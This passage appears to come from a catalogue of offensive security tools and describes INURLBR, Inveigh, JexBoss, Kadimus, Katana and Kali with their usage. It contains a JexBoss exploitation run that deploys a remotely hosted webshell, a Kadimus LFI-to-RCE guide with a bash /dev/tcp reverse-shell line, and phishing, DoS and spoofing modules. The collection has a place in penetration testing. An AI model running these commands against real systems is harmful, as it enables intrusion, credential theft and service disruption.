    Format {TYPE_EXPLOIT}::{EXPLOIT_COMMAND}
    Example Format: NMAP::nmap -sV _TARGET_
    Example Format: EXPLOIT1::php xpl.php -t _TARGET_ -s output.txt
    Usage:    --exploit-cad 'NMAP::nmap -sV _TARGET_' 
    Observation: Each registered command is identified by an id of your array.
                 Commands are logged in exploits.conf file.

 --exploit-all-id Execute commands, exploits based on id of use,
    (all) is run for each target found by the engine.
     Example: --exploit-all-id {id,id}
     Usage:   --exploit-all-id 1,2,8,22

 --exploit-vul-id Execute commands, exploits based on id of use,
    (vull) run command only if the target was considered vulnerable.
     Example: --exploit-vul-id {id,id}
     Usage:   --exploit-vul-id 1,2,8,22

 --exploit-list List all entries command in exploits.conf file.


    [!] Running subprocesses:

 --sub-file  Subprocess performs an injection 
     strings in URLs found by the engine, via GET or POST.
     Example: --sub-file {youfile}
     Usage:   --sub-file exploits_get.txt

 --sub-get defines whether the strings coming from 
     --sub-file will be injected via GET.
     Usage:   --sub-get

 --sub-post defines whether the strings coming from 
     --sub-file will be injected via POST.
     Usage:   --sub-get


 --sub-cmd-vul Each vulnerable URL found within the sub-process
     will execute the parameters of this command.
     Example: --sub-cmd-vul {command}
     Usage:   --sub-cmd-vul 'nmap sV -p 22,80,21 _TARGET_'
              --sub-cmd-vul './exploit.sh _TARGET_ output.txt'
              --sub-cmd-vul 'php miniexploit.php -t _TARGET_ -s output.txt'

 --sub-cmd-all Run command to each target found within the sub-process scope.
     Example: --sub-cmd-all {command}
     Usage:   --sub-cmd-all 'nmap sV -p 22,80,21 _TARGET_'
              --sub-cmd-all './exploit.sh _TARGET_ output.txt'
              --sub-cmd-all 'php miniexploit.php -t _TARGET_ -s output.txt'


 --port-scan Defines ports that will be validated as open.
     Example: --port-scan {ports}
     Usage:   --port-scan '22,21,23,3306'

 --port-cmd Define command that runs when finding an open door.
     Example: --port-cmd {command}
     Usage:   --port-cmd './xpl _TARGETIP_:_PORT_'
              --port-cmd './xpl _TARGETIP_/file.php?sqli=1'

 --port-write Send values for door.
     Example: --port-write {'value0','value1','value3'}
     Usage:   --port-write "'NICK nk_test','USER nk_test 8 * :_ola','JOIN #inurlbrasil','PRIVMSG #inurlbrasil : minha_msg'"



    [!] Modifying values used within script parameters:

 md5 Encrypt values in md5.
     Example: md5({value})
     Usage:   md5(102030)
     Usage:   --exploit-get 'user?id=md5(102030)'

 base64 Encrypt values in base64.
     Example: base64({value})
     Usage:   base64(102030)
     Usage:   --exploit-get 'user?id=base64(102030)'

 hex Encrypt values in hex.
     Example: hex({value})
     Usage:   hex(102030)
     Usage:   --exploit-get 'user?id=hex(102030)'

 Generate random values.
     Example: random({character_counter})
     Usage:   random(8)
     Usage:   --exploit-get 'user?id=random(8)'


Usage
To get a list of basic options and switches use:
php inurlbr.php -h

To get a list of all options and switches use:
python inurlbr.php --help


Download INURLBR

Inveigh - A Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP/SMB


Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions.

Notes
  1. Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/SMB NTLMv1/NTLMv2 challenge/response capture.
  2. LLMNR/NBNS spoofing is performed through sniffing and sending with raw sockets.
  3. SMB challenge/response captures are performed by sniffing over the host system's SMB service.
  4. HTTP challenge/response captures are performed with a dedicated listener.
  5. The local LLMNR/NBNS services do not need to be disabled on the host system.
  6. LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind.
  7. Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS.
  8. Ensure that the LMMNR,NBNS,SMB,HTTP ports are open within any local firewall on the host system.
  9. Output files will be created in current working directory.
  10. If you copy/paste challenge/response captures from output window for password cracking, remove carriage returns.

Usage

Obtain an elevated administrator or SYSTEM shell. If necessary, use a method to bypass script execution policy.
To execute with default settings:
Inveigh.ps1 -i localip
To execute with features enabled/disabled:
Inveigh.ps1 -i localip -LLMNR Y/N -NBNS Y/N -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ForceWPADAuth Y/N


Download Inveigh

IP Thief - Simple IP Stealer in PHP


A simple PHP script to capture the IP address of anyone that send the "imagen.php" file with the following options:
[+] It comes with an administrator to view and delete IP
[+] You can change the redirect URL image
[+] Can you see the country of the visitor


Download IP Thief

IVRE - A Python network recon framework, based on Nmap, Bro & p0f


IVRE (Instrument de veille sur les réseaux extérieurs) or DRUNK (Dynamic Recon of UNKnown networks) is a network recon framework, including two modules for passive recon (one p0f-based and one Bro-based) and one module for active recon (mostly Nmap-based, with a bit of ZMap).
The advertising slogans are:
  • (in French): IVRE, il scanne Internet.
  • (in English): Know the networks, get DRUNK!
The names IVRE and DRUNK have been chosen as a tribute to "Le Taullier".

External programs / dependencies

IVRE relies on:
  • Python 2, version 2.6 minimum
  • Nmap & ZMap
  • Bro & p0f
  • MongoDB, version 2.6 minimum
  • a web server (successfully tested with Apache and Nginx, should work with anything capable of serving static files and run a Python-based CGI), although a test web server is now distributed with IVRE (httpd-ivre)
  • a web browser (successfully tested with recent versions of Firefox and Chromium)
  • Maxmind GeoIP free databases
  • optionally Tesseract, if you plan to add screenshots to your Nmap scan results
  • optionally Docker & Vagrant (version 1.6 minimum)
IVRE comes with (refer to the LICENSE-EXTERNAL file for the licenses):

Passive recon

The following steps will show some examples of passive network recon with IVRE. If you only want active (for example, Nmap-based) recon, you can skip this part.

Using Bro

You need to run bro (2.3 minimum) with the option -b and the location of the passiverecon.bro file. If you want to run it on the eth0 interface, for example, run:
# mkdir logs
# bro -b /usr/local/share/ivre/passiverecon/passiverecon.bro -i eth0
If you want to run it on the capture file (capture needs to a PCAP file), run:
$ mkdir logs
$ bro -b /usr/local/share/ivre/passiverecon/passiverecon.bro -r capture
This will produce log files in the logs directory. You need to run a passivereconworker to process these files. You can try:
$ passivereconworker --directory=logs
This program will not stop by itself. You can (p)kill it, it will stop gently (as soon as it has finished to process the current file).

Using p0f

To start filling your database with information from the eth0 interface, you just need to run (passiverecon is just a sensor name here):
# p0f2db -s passiverecon iface:eth0
And from the same capture file:
$ p0f2db -s passiverecon capture

Using the results

You have two options for now:
  • the ipinfo command line tool
  • the db.passive object of the ivre.db Python module
For example, to show everything stored about an IP address or a network:
$ ipinfo 1.2.3.4
$ ipinfo 1.2.3.0/24
See the output of ipinfo --help.
To use the Python module, run for example:
$ python
>>> from ivre.db import db
>>> db.passive.get(db.passive.flt_empty)[0]
For more, run help(db.passive) from the Python shell.

Active recon

Scanning

The easiest way is to install IVRE on the "scanning" machine and run:
# runscans --routable --limit 1000 --output=XMLFork
This will run a standard scan against 1000 random hosts on the Internet by running 30 nmap processes in parallel. See the output of runscans --help if you want to do something else.
When it's over, to import the results in the database, run:
$ nmap2db -c ROUTABLE-CAMPAIGN-001 -s MySource -r scans/ROUTABLE/up
Here, ROUTABLE-CAMPAIGN-001 is a category (just an arbitrary name that you will use later to filter scan results) and MySource is a friendly name for your scanning machine (same here, an arbitrary name usable to filter scan results; by default, when you insert a scan result, if you already have a scan result for the same host address with the same source, the previous result is moved to an "archive" collection (fewer indexes) and the new result is inserted in the database).
There is an alternative to installing IVRE on the scanning machine that allows to use several agents from one master. See the AGENT file, the program runscans-agent for the master and the agent/ directory in the source tree.

Using the results

You have three options:
  • the scancli command line tool
  • the db.nmap object of the ivre.db Python module
  • the web interface

CLI: scancli

To get all the hosts with the port 22 open:
$ scancli --port 22
See the output of scancli --help.

Python module

To use the Python module, run for example:
$ python
>>> from ivre.db import db
>>> db.nmap.get(db.nmap.flt_empty)[0]
For more, run help(db.nmap) from the Python shell.

Web interface

The interface is meant to be easy to use, it has its own documentation.


JADX - Java source code from Android Dex and Apk files


Command line and GUI tools for produce Java source code from Android Dex and Apk files.

Usage

jadx[-gui] [options] <input file> (.dex, .apk, .jar or .class)
options:
 -d, --output-dir    - output directory
 -j, --threads-count - processing threads count
 -f, --fallback      - make simple dump (using goto instead of 'if', 'for', etc)
     --cfg           - save methods control flow graph to dot file
     --raw-cfg       - save methods control flow graph (use raw instructions)
 -v, --verbose       - verbose output
 -h, --help          - print this help
Example:
 jadx -d out classes.dex


Download JADX

Java LOIC - Low Orbit Ion Cannon. A Java based network stress testing application


Low Orbit Ion Cannon. The project is a Java implementation of LOIC written by Praetox but it's not related with the original project. The main purpose of Java LOIC is testing your network.

Java LOIC should work on most operating systems.


Download Java LOIC

JexBoss - Jboss Verify And Exploitation Tool

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server.

Requirements

  • Python <= 2.7.x

Installation

To install the latest version of JexBoss, please use the following commands:
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
python jexboss.py

Features

The tool and exploits were developed and tested for versions 3, 4, 5 and 6 of the JBoss Application Server.
The exploitation vectors are:
  • /jmx-console
    • tested and working in JBoss versions 4, 5 and 6
  • /web-console/Invoker
    • tested and working in JBoss versions 4
  • /invoker/JMXInvokerServlet
    • tested and working in JBoss versions 4 and 5

Usage example

  • Check the file "demo.png"
$ git clone https://github.com/joaomatosf/jexboss.git
$ cd jexboss
$ python jexboss.py https://site-teste.com

 * --- JexBoss: Jboss verify and EXploitation Tool  --- *
 |                                                      |
 | @author:  João Filho Matos Figueiredo                |
 | @contact: joaomatosf@gmail.com                       |
 |                                                      |
 | @update: https://github.com/joaomatosf/jexboss       |
 #______________________________________________________#


 ** Checking Host: https://site-teste.com **

 * Checking web-console:           [ OK ]
 * Checking jmx-console:           [ VULNERABLE ]
 * Checking JMXInvokerServlet:         [ VULNERABLE ]


 * Do you want to try to run an automated exploitation via "jmx-console" ?
   This operation will provide a simple command shell to execute commands on the server..
   Continue only if you have permission!
   yes/NO ? yes

 * Sending exploit code to https://site-teste.com. Wait...


 * Info: This exploit will force the server to deploy the webshell 
   available on: http://www.joaomatosf.com/rnp/jbossass.war
 * Successfully deployed code! Starting command shell, wait...

 * - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - * 

 * https://site-teste.com: 

 Linux fwgw 2.6.32-431.29.2.el6.x86_64 #1 SMP Tue Sep 9 21:36:05 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

 CentOS release 6.5 (Final)

 uid=509(jboss) gid=509(jboss) grupos=509(jboss) context=system_u:system_r:initrc_t:s0

[Type commands or "exit" to finish]
Shell> pwd
/usr/jboss-6.1.0.Final/bin

[Type commands or "exit" to finish]
Shell> hostname
fwgw

[Type commands or "exit" to finish]
Shell> ls -all /tmp 
total 35436
drwxrwxrwt.  4 root root     4096 Nov 24 16:36 .
dr-xr-xr-x. 22 root root     4096 Nov 23 03:26 ..
-rw-r--r--.  1 root root 34630995 Out 15 18:07 snortrules-snapshot-2962.tar.gz
-rw-r--r--.  1 root root       32 Out 16 14:51 snortrules-snapshot-2962.tar.gz.md5
-rw-------.  1 root root        0 Set 20 16:45 yum.log
-rw-------.  1 root root     2743 Set 20 17:18 yum_save_tx-2014-09-20-17-18nQiKVo.yumtx
-rw-------.  1 root root     1014 Out  6 00:33 yum_save_tx-2014-10-06-00-33vig5iT.yumtx
-rw-------.  1 root root      543 Out  6 02:14 yum_save_tx-2014-10-06-02-143CcA5k.yumtx
-rw-------.  1 root root    18568 Out 14 03:04 yum_save_tx-2014-10-14-03-04Q9ywQt.yumtx
-rw-------.  1 root root      315 Out 15 16:00 yum_save_tx-2014-10-15-16-004hKzCF.yumtx

[Type commands or "exit" to finish]
Shell>


Download JexBoss

Johnny - GUI for John the Ripper


Johnny is a cross-platform open-source GUI for the popular password cracker John the Ripper.

Features
  1. user could start, pause and resume attack (though only one session is allowed globally),
  2. all attack related options work,
  3. all input file formats are supported (pure hashes, pwdump, passwd, mixed),
  4. ability to resume any previously started session via session history,
  5. suggest the format of each hashes,
  6. try lucky guesses with password guessing feature,
  7. “smart” default options,
  8. accurate output of cracked passwords,
  9. config is stored in .conf file (~/.john/johnny.conf),
  10. nice error messages and other user friendly things,
  11. export of cracked passwords through clipboard,
  12. export works with office suits (tested with LibreOffice Calc),
  13. available in english and french,
  14. allows you to set environment variables for each session directly in Johnny


Joomlavs - A Black Box, Joomla Vulnerability Scanner


JoomlaVS is a Ruby application that can help automate assessing how vulnerable a Joomla installation is to exploitation. It supports basic finger printing and can scan for vulnerabilities in components, modules and templates as well as vulnerabilities that exist within Joomla itself.

How to install
JoomlaVS has so far only been tested on Debian, but the installation process should be similar across most operating systems.
  1. Ensure Ruby [2.0 or above] is installed on your system
  2. Clone the source code using git clone https://github.com/rastating/joomlavs.git
  3. Install bundler and required gems using sudo gem install bundler && bundle install

How to use
The only required option is the -u / --url option, which specifies the address to target. To do a full scan, however, the --scan-all option should also be specified, e.g. ruby joomlavs.rb -u yourjoomlatarget.com --scan-all .
A full list of options can be found below:
usage: joomlavs.rb [options]
Basic options
    -u, --url              The Joomla URL/domain to scan.
    --basic-auth           <username:password> The basic HTTP authentication credentials
    -v, --verbose          Enable verbose mode
Enumeration options
    -a, --scan-all         Scan for all vulnerable extensions
    -c, --scan-components  Scan for vulnerable components
    -m, --scan-modules     Scan for vulnerable modules
    -t, --scan-templates   Scan for vulnerable templates
    -q, --quiet            Scan using only passive methods
Advanced options
    --follow-redirection   Automatically follow redirections
    --no-colour            Disable colours in output
    --proxy                <[protocol://]host:port> HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported. If no protocol is given, HTTP will be used
    --proxy-auth           <username:password> The proxy authentication credentials
    --threads              The number of threads to use when multi-threading requests
    --user-agent           The user agent string to send with all requests


Download Joomlavs

jSQL Injection v0.73 - Java Tool For Automatic SQL Database Injection.


jSQL Injection is a lightweight application used to find database information from a distant server.

jSQL is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris).

jSQL is part of Kali Linux, the official new BackTrack penetration distribution.

jSQL is also included in Black Hat Sec, ArchAssault Project, BlackArch Linux and Cyborg Hawk Linux.

Change log

Coming... i18n arabic russian chinese integration, next db engines: SQLite Access MSDE...
v0.73 Authentication Basic Digest Negotiate NTLM and Kerberos, database type selection
v0.7 Batch scan, Github issue reporter, support for 16 db engines, optimized GUI
alpha-v0.6 Speed x 2 (no more hex encoding), 10 db vendors supported: MySQL Oracle SQLServer PostgreSQL DB2 Firebird Informix Ingres MaxDb Sybase. JUnit tests, log4j, i18n integration and more.
0.5 SQL shell, Uploader.
0.4 Admin page search, Brute force (md5 mysql...), Decoder (decode encode base64 hex md5...).
0.3 Distant file reader, Webshell drop, Terminal for webshell commands, Configuration backup, Update checker.
0.2 Time based algorithm, Multi-thread control (start pause resume stop), Shows URL calls.


Download jSQL Injection v0.73

Just-Metadata - Tool that Gathers and Analyzes Metadata about IP Addresses


Just-Metadata is a tool that can be used to gather intelligence information passively about a large number of IP addresses, and attempt to extrapolate relationships that might not otherwise be seen. Just-Metadata has "gather" modules which are used to gather metadata about IPs loaded into the framework across multiple resources on the internet. Just-Metadata also has "analysis" modules. These are used to analyze the data loaded Just-Metadata and perform various operations that can identify potential relationships between the loaded systems.

Just-Metadata will allow you to quickly find the Top "X" number of states, cities, timezones, etc. that the loaded IP addresses are located in. It will allow you to search for IP addresses by country. You can search all IPs to find which ones are used in callbacks as identified by VirusTotal. Want to see if any IPs loaded have been documented as taking part of attacks via the Animus Project, Just-Metadata can do it.

Additionally, it is easy to create new analysis modules to let people find other relationships between IPs loaded based on the available data. New intel gathering modules can be easily added in just as easily!

Setup

Ideally, you should be able to run the setup script, and it will install everything you need.
For the Shodan information gathering module, YOU WILL NEED a Shodan API key. This costs like $9 bucks, come on now, it's worth it :).

Usage

As of now, Just metadata is designed to read in a single text file containing IPs, each on their own new line. Create this file from any source (C2 callback IPs, web server logs, etc.). Once you have this file, start Just-Metadata by calling it:
./Just-Metadata.py

Commands

help - Once in the framework, to see a listing of available commands and a description of what they do, type the "help" command.

load <filename> - The load command takes an extra parameter, the file name that you (the user) want Just-Metadata to load IP addresses from. This command will open, and load all IPs within the file to the framework.
Ex: load ipaddresses.txt

save - The save command can be used to save the current working state of Just-Metadata. This is helpful in multiple cases, such as after gathering information about IPs, and wanting to save the state off to disk to be able to work on them at a later point in time. Simply typing "save" will result in Just-Metadata saving the state to disk, and displaying the filename of the saved state.

import <statefile> - The import command can be used to load a previously saved Just-Metadata state into the framework. It will load all IPs that were saved, and all information gathered about the IP addresses. This command will require an extra parameter, the name of the state file that you want Just-Metadata to load.
Ex: import goodfile.state

list <module type> - The list command can be used to list the different types of modules loaded into Just-Metadata. This command will take an extra parameter, either "analysis" or "gather". Just-Metadata will display all mofules of the type that the user requests is listed.
Ex: list analysis
Ex: list gather

gather <gather module name> - The gather command tells Just-Metadata to run the module specified and gather information from that source. This can be used to gather geographical information, Virustotal, whois, and more. It's all based on the module. The data gathered will be stored within the framework in memory and can also be saved to disk with the "save" command.
Ex: gather geoinfo
Ex: gather virustotal

analyze <analysis module name> - The analyze command tells Metadata to run an analysis module against the data loaded into the framework. These modules can be used to find IP addresses that share the same SSH keys or SSL Public Key certificates, or certificate chains. They can also be used to find IP addresses used in the same callbacks by malicious executables.

ip_info <IP Address> - This command is used to dump all information about a specific IP address. This is currently being used after having run analysis modules. For example, after identifying IP addresses that share the same SSH keys, I can dump all information about those IPs. I will see if they have been used by malware, where they are located, etc.

export - The export command will have Just-Metadata dump all information that's been gathered about all IP addresses currently loaded into the framework to CSV.

Read more here.

Kadimus - LFI Scan & Exploit Tool


Kadimus is a tool to check sites to lfi vulnerability , and also exploit it

Features:
  • Check all url parameters
  • /var/log/auth.log RCE
  • /proc/self/environ RCE
  • php://input RCE
  • data://text RCE
  • Source code disclosure
  • Multi thread scanner
  • Command shell interface through HTTP Request
  • Proxy support (socks4://, socks4a://, socks5:// ,socks5h:// and http://)

Compile:

Installing libcurl:
  • CentOS/Fedora
# yum install libcurl-devel
  • Debian based
# apt-get install libcurl4-openssl-dev


Installing libpcre:

  • CentOS/Fedora
# yum install libpcre-devel
  • Debian based
# apt-get install libpcre3-dev


Installing libssh:
  • CentOS/Fedora
# yum install libssh-devel
  • Debian based
# apt-get install libssh-dev

And finally:
$ git clone https://github.com/P0cL4bs/Kadimus.git
$ cd Kadimus
$ make


Options:
  -h, --help                    Display this help menu

  Request:
    -B, --cookie STRING         Set custom HTTP Cookie header
    -A, --user-agent STRING     User-Agent to send to server
    --connect-timeout SECONDS   Maximum time allowed for connection
    --retry-times NUMBER        number of times to retry if connection fails
    --proxy STRING              Proxy to connect, syntax: protocol://hostname:port

  Scanner:
    -u, --url STRING            Single URI to scan
    -U, --url-list FILE         File contains URIs to scan
    -o, --output FILE           File to save output results
    --threads NUMBER            Number of threads (2..1000)

  Explotation:
    -t, --target STRING         Vulnerable Target to exploit
    --injec-at STRING           Parameter name to inject exploit
                                (only need with RCE data and source disclosure)

  RCE:
    -X, --rce-technique=TECH    LFI to RCE technique to use
    -C, --code STRING           Custom PHP code to execute, with php brackets
    -c, --cmd STRING            Execute system command on vulnerable target system
    -s, --shell                 Simple command shell interface through HTTP Request

    -r, --reverse-shell         Try spawn a reverse shell connection.
    -l, --listen NUMBER         port to listen

    -b, --bind-shell            Try connect to a bind-shell
    -i, --connect-to STRING     Ip/Hostname to connect
    -p, --port NUMBER           Port number to connect

    --ssh-port NUMBER           Set the SSH Port to try inject command (Default: 22)
    --ssh-target STRING         Set the SSH Host

    RCE Available techniques

      environ                   Try run PHP Code using /proc/self/environ
      input                     Try run PHP Code using php://input
      auth                      Try run PHP Code using /var/log/auth.log
      data                      Try run PHP Code using data://text

    Source Disclosure:
      -G, --get-source          Try get the source files using filter://
      -f, --filename STRING     Set filename to grab source [REQUIRED]
      -O FILE                   Set output file (Default: stdout)


Examples:

Scanning:
./kadimus -u localhost/?pg=contact -A my_user_agent
./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0

Get source code of file:
./kadimus -t localhost/?pg=contact -G -f "index.php" -O local_output.php --inject-at pg

Execute php code:
./kadimus -t localhost/?pg=php://input -C '<?php echo "pwned"; ?>' -X input

Execute command:
./kadimus -t localhost/?pg=/var/log/auth.log -X auth -c 'ls -lah' --ssh-target localhost

Checking for RFI:
You can also check for RFI errors, just put the remote url on resource/common_files.txt and the regex to identify this, example:
/* http://bad-url.com/shell.txt */ <?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>
in file:
http://bad-url.com/shell.txt?:scorpion say get over here

Reverse shell:
./kadimus -t localhost/?pg=contact.php -Xdata --inject-at pg -r -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1' --retry-times 0


Download Kadimus

Kali Linux 1.1.0 - The Best Penetration Testing Distribution


After almost two years of public development (and another year behind the scenes), we are proud to announce our first point release of Kali Linux – version 1.1.0. This release brings with it a mix of unprecedented hardware support as well as rock solid stability. For us, this is a real milestone as this release epitomizes the benefits of our move from BackTrack to Kali Linux over two years ago. As we look at a now mature Kali, we see a versatile, flexible Linux distribution, rich with useful security and penetration testing related features, running on all sorts of weird and wonderful ARM hardware. But enough talk, here are the goods:
  • The new release runs a 3.18 kernel, patched for wireless injection attacks.
  • Our ISO build systems are now running off live-build 4.x.
  • Improved wireless driver support, due to both kernel and firmware upgrades.
  • NVIDIA Optimus hardware support.
  • A whole bunch of fixes and updates from our bug-tracker changelog.
  • And most importantly, we changed grub screens and wallpapers!

Upgrade Kali Linux 1.1.0

If you’ve already got Kali Linux installed and running, there’s no need to re-download the image as you can simply update your existing operating system using simple apt commands:
apt-get update
apt-get dist-upgrade


Kali Linux 2.0 - The Best Penetration Testing Distribution


So, what’s new in Kali 2.0? There’s a new 4.0 kernel, now based on Debian Jessie, improved hardware and wireless driver coverage, support for a variety of Desktop Environments (gnome, kde, xfce, mate, e17, lxde, i3wm), updated desktop environment and tools – and the list goes on.

Kali Linux is Now a Rolling Distribution

One of the biggest moves we’ve taken to keep Kali 2.0 up-to-date in a global, continuous manner, is transforming Kali into a rolling distribution. What this means is that we are pulling our packages continuously from Debian Testing (after making sure that all packages are installable) – essentially upgrading the Kali core system, while allowing us to take advantage of newer Debian packages as they roll out. This move is where our choice in Debian as a base system really pays off – we get to enjoy the stability of Debian, while still remaining on the cutting edge.

Continuously Updated Tools, Enhanced Workflow

Another interesting development in our infrastructure has been the integration of an upstream version checking system, which alerts us when new upstream versions of tools are released (usually via git tagging). This script runs daily on a select list of common tools and keeps us alerted if a new tool requires updating. With this new system in place, core tool updates will happen more frequently. With the introduction of this new monitoring system, we  will slowly start phasing out the “tool upgrades” option in our bug tracker.

New Flavours of Kali Linux 2.0

Through our Live Build process, Kali 2.0 now natively supports KDE, GNOME3, Xfce, MATE, e17, lxde and i3wm. We’ve moved on to GNOME 3 in this release, marking the end of a long abstinence period. We’ve finally embraced GNOME 3 and with a few custom changes, it’s grown to be our favourite desktop environment. We’ve added custom support for multi-level menus, true terminal transparency, as well as a handful of useful gnome shell extensions. This however has come at a price – the minimum RAM requirements for a full GNOME 3 session has increased to 768 MB. This is a non-issue on modern hardware but can be detrimental on lower-end machines. For this reason, we have also released an official, minimal Kali 2.0 ISO. This “light” flavour of Kali includes a handful of useful tools together with the lightweight Xfce desktop environment – a perfect solution for resource-constrained computers.

Kali Linux 2.0 ARM Images & NetHunter 2.0

The whole ARM image section has been updated across the board with Kali 2.0 – including Raspberry Pi, Chromebooks, Odroids… The whole lot! In the process, we’ve added some new images – such as the latest Chromebook Flip – the little beauty here on the right. Go ahead, click on the image, take a closer look. Another helpful change we’ve implemented in our ARM images is including kernel sources, for easier compilation of new drivers.
We haven’t forgotten about NetHunter, our favourite mobile penetration testing platform – which also got an update and now includes Kali 2.0. With this, we’ve released a whole barrage of new NetHunter images for Nexus 5, 6, 7, 9, and 10. The OnePlus One NetHunter image has also been updated to Kali 2.0 and now has a much awaited image for CM12 as well – check the Offensive Security NetHunter page for more information.

Updated VMware and VirtualBox Images

Offensive Security, the information security training and penetration testing company behind Kali Linux, has put up new VMware and VirtualBox Kali 2.0 images for those who want to try Kali in a virtual environment. These include 32 and 64 bit flavours of the GNOME 3 full Kali environment.
If you want to build your own virtual environment, you can consult our documentation site on how to install the various virtual guest tools for a smoother experience.

How Do I Upgrade to Kali 2.0?

Yes, you can upgrade Kali 1.x to Kali 2.0! To do this, you will need to edit your source.list entries, and run a dist-upgrade as shown below. If you have been using incorrect or extraneous Kali repositories or otherwise manually installed or overwritten Kali packages outside of apt, your upgrade to Kali 2.0 may fail. This includes scripts like lazykali.sh, PTF, manual git clones in incorrect directories, etc. – All of these will clobber existing files on the filesystem and result in a failed upgrade. If this is the case for you, you’re better off reinstalling your OS from scratch.
Otherwise, feel free to:
cat << EOF > /etc/apt/sources.list
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
EOF

apt-get update
apt-get dist-upgrade # get a coffee, or 10.
reboot


Download Kali Linux 2.0

Kali Linux NetHunter - Android penetration testing platform


NetHunter is a Android penetration testing platform for Nexus and OnePlus devices built on top of Kali Linux, which includes some special and unique features. Of course, you have all the usual Kali tools in NetHunter as well as the ability to get a full VNC session from your phone to a graphical Kali chroot, however the strength of NetHunter does not end there.

We’ve incorporated some amazing features into the NetHunter OS which are both powerful and unique. From pre-programmed HID Keyboard (Teensy) attacks, to BadUSB Man In The Middle attacks, to one-click MANA Evil Access Point setups. And yes, NetHunter natively supports wireless 802.11 frame injection with a variety of supported USB NICs. NetHunter is still in its infancy and we are looking forward to seeing this project and community grow.


Supported Devices
The Kali NetHunter image is currently compatible with the following Nexus and OnePlus devices:
  • Nexus 4 (GSM) - “mako”
  • Nexus 5 (GSM/LTE) - “hammerhead”
  • Nexus 7 [2012] (Wi-Fi) - “nakasi”
  • Nexus 7 [2012] (Mobile) - “nakasig”
  • Nexus 7 [2013] (Wi-Fi) - “razor”
  • Nexus 7 [2013] (Mobile) - “razorg”
  • Nexus 10 (Tablet) - “mantaray”
  • OnePlus One 16 GB - “bacon”
  • OnePlus One 64 GB - “bacon”

Important Concepts
  • Kali NetHunter runs within a chroot environment on the Android device so, for example, if you start an SSH server via an Android application, your SSH connection would connect to Android and not Kali Linux. This applies to all network services.
  • When configuring payloads, the IP address field is the IP address of the system where you want the shell to return to. Depending on your scenario, you may want this address to be something other than the NetHunter.
  • Due to the fact that the Android device is rooted, Kali NetHunter has access to all hardware, allowing you to connect USB devices such as wireless NICs directly to Kali using an OTG cable.

Download Kali Linux NetHunter

Katana - Framework for Hackers, Professional Security and Developers


Katana is a framework written in python for making penetration testing, based on a simple and comprehensive structure for anyone to use, modify and share, the goal is to unify tools serve for professional when making a penetration test or simply as a routine tool, The current version is not completely stable, not complete.

The project is open to partners.

SOURCE CODE ORGANIZATION

The Katana source code is organized as follows:
-KatanaGUI/ > Source code for graphical user interface
-KatanaLAB/ > Source code for katana laboratory
-core/ > Source code core
--core/db/ > Dictionaries and tables
--core/logs/ > Registers of modules
-files/ > Files necessary for some modules
-tmp/ > Temp files
-lib/ > Libraries
-doc/ > Documentation
-scripts/ > Scripts(modules)

MAIN FILES

--core
  ¬Setting.py         --- Setting variables
  ¬design.py          --- Design template
  ¬Errors.py          --- Error Debug
  ¬ping.py            --- Funcitons
--scripts
  ¬__init__.py        --- Modules List


REQUIREMENTS

OS requirement: Kali Linux

INSTALLATION 

Installation of Katana framework:
git clone https://github.com/RedToor/katana.git
cd Katana
chmod 777 install.py
python install.py

USAGE Commands

Stable ------------------------------------------------------------------
./sudo ktf.console                                   98% Builded - Enabled
./sudo ktf.run -m net/arpspoof                       95% Builded - Enabled
Building ----------------------------------------------------------------
ktf.lab                                              30% Builded - No yet.
ktf.linker -m web/whois -t google.com -p 80          80% Builded - No yet.

MODULES (SCRIPTS)

Code Name Description Autor Version
web/httpbt Brute force to http 403 Redtoor 1.0
web/formbt Brute force to form-based Redtoor 1.0
web/cpfinder Admin panel finder Redtoor 1.0
web/joomscan Scanner vul's cms joomla Redtoor 1.0
web/dos Denial of service web Redtoor 1.0
web/whois Who-is web Redtoor 1.0
net/arpspoof ARP-Spoofing attack Redtoor 1.0
net/arplook ARP-Spoofing detector cl34r 1.0
net/portscan Port Scanner RedToor 1.0
set/gdreport Getting information with web RedToor 3.0
set/mailboom E-mail boombing SPAM RedToor 3.0
set/facebrok facebook phishing plataform RedToor 1.7
fle/brutezip Brute force to zip files LeSZO ZerO 1.0
fle/bruterar Brute force to rar files LeSZO ZerO 1.0
clt/ftp Console ftp client Redtoor 1.0
clt/sql Console sql client Redtoor 1.0
clt/pop3 Console pop3 client Redtoor 1.0
clt/ftp Console ftp client Redtoor 1.0
ser/sql Start SQL server Redtoor 1.0
ser/apache Start Apache server Redtoor 1.0
ser/ssh Start SSH server Redtoor 1.0
fbt/ftp Brute force to ftp Redtoor 1.0
fbt/ssh Brute force to ssh Redtoor 1.0
fbt/sql Brute force to sql Redtoor 1.0
fbt/pop3 Brute force to pop3 Redtoor 1.0

LINKS

Project in SF : http://sourceforge.net/projects/katanas/files/
Documentation: https://github.com/RedToor/Katana/tree/master/doc
Blog of project[ES]: http://cave-rt.blogspot.com.co/2015/07/instalacion-y-uso-katana-framework.html


Download Katana

Katoolin - Automatically install all Kali Linux tools


Automatically install all Kali linux tools

Features
  • Add Kali linux repositories
  • Remove kali linux repositorie
  • Install Kali linux tools

Requirements
  • Python 2.7
  • An operating system (tested on Ubuntu)

Instalation
sudo su
git clone https://github.com/LionSec/katoolin.git && cp katoolin/katoolin.py /usr/bin/katoolin
chmod +x /usr/bin/katoolin
sudo katoolin

Video

Usage
  • Just select the number of a tool to install it
  • Press 0 to install all tools
  • back : Go back
  • gohome : Go to the main menu

Download Katoolin

